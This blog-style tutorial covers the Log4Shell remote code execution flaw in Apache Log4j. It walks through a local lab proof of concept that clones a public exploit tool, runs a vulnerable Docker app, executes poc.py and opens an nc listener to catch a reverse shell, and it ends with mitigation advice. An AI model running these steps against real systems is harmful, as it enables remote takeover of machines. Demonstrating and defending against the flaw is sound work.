Image Source: https://thehackernews.com/2021/12/apache-log4j-vulnerability-log4shell.html
The Log4j vulnerability is a critical remote code execution (RCE) vulnerability in the Apache Log4j logging library. It was first disclosed on December 9, 2021, and is considered to be one of the most serious software vulnerabilities ever discovered.
The vulnerability exists in the way that Log4j processes certain types of log messages. An attacker can exploit this vulnerability by sending a specially crafted log message to a vulnerable system. This message can then be used to execute arbitrary code on the system.
The Log4j vulnerability affects a wide range of software, including many popular applications and services. Some of the known victims of the vulnerability include Minecraft, Amazon Web Services, Cisco, and VMware.
Reqirements
– Exploit Tool(https://github.com/kozmer/log4j-shell-poc)
– Vulnerable jdk Version
– Victim Endpoint
– Attacker Endpoing(Optional)
Now let’s make a Poc of how we can exploit this vulnerability.
Download the tool
git clone https://github.com/kozmer/log4j-shell-poc
And then, install the requirements.txt
pip install -r requirements.txt
Let’s install the Docker to fetch vulnerable application.
sudo snap install docker
Now, let’s go into the folder where the exploit tool we downloaded is and fetch the vulnerable docker image.
Let’s check docker images
Let’s run our build command to get our image up and running.
docker run --network host log4j-shell-poc
Then check the localhost:8080 and be sure that application is up or not.
Now let’s download one of the older versions of jdk. I will prefer jdk-8u20-linux.
Move the jdk to inside of exploit tool.
mv jdk-8u20-linux-x64.tar.gz /home/ali/Desktop/log4j-shell-poc-mainThen extract the tar file.
tar -xf jdk-8u20-linux-x64.tar.gzNow, run the poc.py script with necessary parameters.
python3 poc.py --userip localhost --webport 8000 --lport 9001
Let’s paste the line printed by the script into the application running on our local host.
Before click login button, we can start listener.
nc -lvnp 9001Then, when we click Login button we can see that we obtain Reverse Shell.
How to Prevent Ourselves against Log4j Vulnerability?
- Upgrade to the latest version of Log4j. The vulnerability has been patched in Log4j version 2.15.0 and later, so upgrading to the latest version is the best way to protect yourself.
- Disable JNDI lookups. If you are unable to upgrade to the latest version of Log4j, you can disable JNDI lookups in your Log4j configuration. This will prevent attackers from exploiting the vulnerability.
- Implement a web application firewall (WAF). A WAF can be used to block malicious requests that are trying to exploit the Log4j vulnerability.
- Monitor your systems for suspicious activity. Even if you have taken all of the above steps, it is still important to monitor your systems for suspicious activity. This will help you to detect and respond to any attacks that may occur.
- Identify Affected Systems Determine which of your systems use Log4j. This may include web applications, server applications, and any software relying on Log4j for logging.
Leave a Reply